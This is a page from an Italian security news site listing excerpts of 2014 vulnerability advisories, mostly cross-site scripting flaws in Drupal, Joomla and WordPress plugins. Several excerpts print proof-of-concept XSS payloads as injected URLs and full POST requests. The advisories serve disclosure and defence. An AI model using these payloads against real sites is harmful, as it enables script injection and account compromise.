Drupal 7.26 Custom Search 7.x-1.13 Cross Site Scripting

3 aprile 2014 - Fonte: http://www.mondounix.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Vulnerability Report
 
 
Author: Justin C. Klein Keane <justin@madirish.net>
Reported: 19 Feb, 2014
 
 
Description of Vulnerability:
- -----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Custom Search module "alters the default
search box in many ways. If you need to have options available like in
advanced search, but directly in the search box, this module is for
you."  The Drupal Custom Search module
(https://drupal.org/project/custom_search) contains a persistent cross
site scripting (XSS) vulnerability due to the fact that it fails to
sanitize filter labels...

Leggi il seguito »

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 aprile 2014 - Fonte: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are much more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...

Leggi il seguito »

Joomla Kunena 3.0.4 Cross Site Scripting

28 marzo 2014 - Fonte: http://www.mondounix.com
Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can post a Google Map using the following BBCode
  [map]content[/map]
 
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049  function DoMap($bbcode, $action, $name, $default, $params, $content) {
  ...
1078  $document->addScriptDeclaration("
1079  // <![CDATA[
  ...
1097  var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE',...

Leggi il seguito »

Joomla eXtplorer 2.1.3 Cross Site Scripting

21 marzo 2014 - Fonte: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string inthe URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.
 
File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
 
 
File:...

Leggi il seguito »

Joomla Freichat Cross Site Scripting

21 marzo 2014 - Fonte: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.
 
 
File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"
></script><script>alert('XSS
1')</script>&xhash=1" <script>alert('XSS
2')</script>
 
 
File: /client/plugins/upload/upload.php
Line: 91
POC:
   </style>
    <body>
        <div
class="frei_upload_border">
        <form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post"...

Leggi il seguito »

Joomla Multi Calendar 4.0.2 Cross Site Scripting

18 marzo 2014 - Fonte: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Multi
calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary
web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault
parameter to index.php.
 
File: /tmpl/layout_editevent.php
Lines: 161 and 481
POC:
http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>
 
File: /tmpl/layout_editevent.php
Line: 319
POC:
http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University...

Leggi il seguito »

Ilch CMS Cross-Site Scripting (XSS)

5 marzo 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23203
Product: Ilch CMS
Vendor: http://ilch.de
Vulnerable Version(s): 2.0 and probably prior
Tested Version: 2.0
Advisory Publication:  February 12, 2014  [without technical details]
Vendor Notification: February 12, 2014 
Public Disclosure: March 5, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-1944
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered...

Leggi il seguito »

WordPress Persistent XSS Media File Renamer V1.7.0

1 marzo 2014 - Fonte: http://www.mondounix.com
Title: Persistent XSS in Media File Renamer V1.7.0 wordpress plugin
Date: 1/31/2014
Author: Larry W. Cashdollar, @_larry0
Vendor: Notified 2/4/2014
CVE: 2014-2040 
Download: 
http://www.meow.fr/media-file-renamer/
 
 
Vulnerability:
The following functions do not sanitize input before being echoed out: 
In file mfrh_class.settings-api.php:
166     function callback_multicheck( $args ) {
167         $value = $this->get_option( $args['id'], $args['section'], $args['std'] );
168         
169         $html = '';
170         foreach ( $args['options'] as $key => $label ) {
171             $checked = isset( $value[$key] ) ? $value[$key] : '0';
172             $html .= sprintf( '
', $args['section'], $a    rgs['id'],...

Leggi il seguito »

WordPress mp3-jplayer 1.8.7 Cross Site Scripting

27 febbraio 2014 - Fonte: http://www.mondounix.com
# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
 
 
# ==============================================================
# Multiple XSS
 
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441
 
mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---
 
Also...

Leggi il seguito »

WordPress PrintFriendly 3.3.7 Cross Site Scripting

27 febbraio 2014 - Fonte: http://www.mondounix.com
# ==============================================================
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
 
 
# ==============================================================
# XSS
 
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389
 
option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---
 
Also...

Leggi il seguito »